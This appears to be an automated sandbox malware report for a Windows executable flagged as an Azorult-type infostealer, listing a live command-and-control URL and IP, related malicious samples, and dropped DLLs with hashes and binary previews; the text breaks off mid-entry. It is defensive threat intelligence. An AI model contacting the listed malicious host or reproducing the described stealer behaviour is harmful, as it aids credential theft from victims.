          https://dotbit.me/a/0%Avira URL Cloudsafe
          http://ln6b9.shop/LN341/index.php100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ln6b9.shop
          		104.21.2.6
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://ln6b9.shop/LN341/index.phptrue
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.mozilla.com/en-US/blocklist/mozglue.dll.1.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://crl.thawte.com/ThawteTimestampingCA.crl0svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drfalse
            • URL Reputation: safe
            		unknown
            http://ln6b9.shop/LN341/index.phpAxsvchost.exe, 00000001.00000002.1774988685.0000000004D90000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.thawte.com0svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drfalse
            • URL Reputation: safe
            		unknown
            http://ip-api.com/json4QihT6CwD8.exe, 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.mozilla.com0svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drfalse
            • URL Reputation: safe
            		unknown
            https://dotbit.me/a/4QihT6CwD8.exe, 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            104.21.2.6
            		ln6b9.shopUnited States
            		13335CLOUDFLARENETUStrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1501433
            Start date and time:2024-08-29 22:46:06 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 39s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:4QihT6CwD8.exe
            renamed because original name is a hash value
            Original Sample Name:45DA35E12BE2E8A17E6ACF41F682C7F9.exe
            Detection:MAL
            Classification:mal100.phis.troj.spyw.evad.winEXE@8/53@1/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 51
            • Number of non-executed functions: 284
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: 4QihT6CwD8.exe

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            104.21.2.6PO No. 3200005919.exeGet hashmaliciousAzorult, GuLoaderBrowse
            • dbxo2.shop/dbx2/index.php

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ln6b9.shopPo#70831.exeGet hashmaliciousAzorultBrowse
            • 172.67.128.117

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUShttps://5kirp.mellifluous5.com/5kiRp/Get hashmaliciousHTMLPhisherBrowse
            • 172.66.0.227
            https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1Get hashmaliciousUnknownBrowse
            • 104.17.246.203
            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
            • 188.114.96.3
            file.exeGet hashmaliciousLummaC, VidarBrowse
            • 188.114.96.3
            rPEDIDO.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            file.exeGet hashmaliciousLummaCBrowse
            • 188.114.96.3
            COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
            • 104.21.10.159
            Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
            • 188.114.97.3
            MT TBA VESSELPARTICULARS_PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
            • 172.67.75.163

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-console-l1-1-0.dllFordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
              Po#70831.exeGet hashmaliciousAzorultBrowse
                FedEx Shipping Document.scr.exeGet hashmaliciousAzorultBrowse
                  FedEx Shipping Document.exeGet hashmaliciousAzorultBrowse
                    ACCEPT_014STSY529093.PDF.exeGet hashmaliciousAzorultBrowse
                      Launcher.exeGet hashmaliciousPython Stealer, Stink StealerBrowse
                        SEL1685129 AMANOS.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                          ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                            ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                              Order No. 203276712.exeGet hashmaliciousAzorult, GuLoaderBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-console-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18744
                                Entropy (8bit):7.080160932980843
                                Encrypted:false
                                SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                MD5:502263C56F931DF8440D7FD2FA7B7C00
                                SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: Fordybendes.exe, Detection: malicious, Browse
                                • Filename: Po#70831.exe, Detection: malicious, Browse
                                • Filename: FedEx Shipping Document.scr.exe, Detection: malicious, Browse
                                • Filename: FedEx Shipping Document.exe, Detection: malicious, Browse
                                • Filename: ACCEPT_014STSY529093.PDF.exe, Detection: malicious, Browse
                                • Filename: Launcher.exe, Detection: malicious, Browse
                                • Filename: SEL1685129 AMANOS.pdf.exe, Detection: malicious, Browse
                                • Filename: ESPLS-RFQ_2400282.exe, Detection: malicious, Browse
                                • Filename: ESPLS-RFQ_2400282.exe, Detection: malicious, Browse
                                • Filename: Order No. 203276712.exe, Detection: malicious, Browse
                                Reputation:high, very likely benign file
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-datetime-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.093995452106596
                                Encrypted:false
                                SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                MD5:CB978304B79EF53962408C611DFB20F5
                                SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:high, very likely benign file
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-debug-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.1028816880814265
                                Encrypted:false
                                SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                MD5:88FF191FD8648099592ED28EE6C442A5
                                SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:high, very likely benign file
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-errorhandling-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.126358371711227
                                Encrypted:false
                                SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                MD5:6D778E83F74A4C7FE4C077DC279F6867
                                SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:high, very likely benign file
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):21816
                                Entropy (8bit):7.014255619395433
                                Encrypted:false
                                SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                MD5:94AE25C7A5497CA0BE6882A00644CA64
                                SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l1-2-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.112057846012794
                                Encrypted:false
                                SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                MD5:E2F648AE40D234A3892E1455B4DBBE05
                                SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l2-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.166618249693435
                                Encrypted:false
                                SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                MD5:E479444BDD4AE4577FD32314A68F5D28
                                SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-handle-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.1117101479630005
                                Encrypted:false
                                SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                MD5:6DB54065B33861967B491DD1C8FD8595
                                SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-heap-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.174986589968396
                                Encrypted:false
                                SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                MD5:2EA3901D7B50BF6071EC8732371B821C
                                SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-interlocked-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):17856
                                Entropy (8bit):7.076803035880586
                                Encrypted:false
                                SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                MD5:D97A1CB141C6806F0101A5ED2673A63D
                                SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-libraryloader-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18744
                                Entropy (8bit):7.131154779640255
                                Encrypted:false
                                SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-localization-l1-2-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):20792
                                Entropy (8bit):7.089032314841867
                                Encrypted:false
                                SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-memory-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18744
                                Entropy (8bit):7.101895292899441
                                Encrypted:false
                                SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                MD5:D500D9E24F33933956DF0E26F087FD91
                                SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-namedpipe-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.16337963516533
                                Encrypted:false
                                SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                MD5:6F6796D1278670CCE6E2D85199623E27
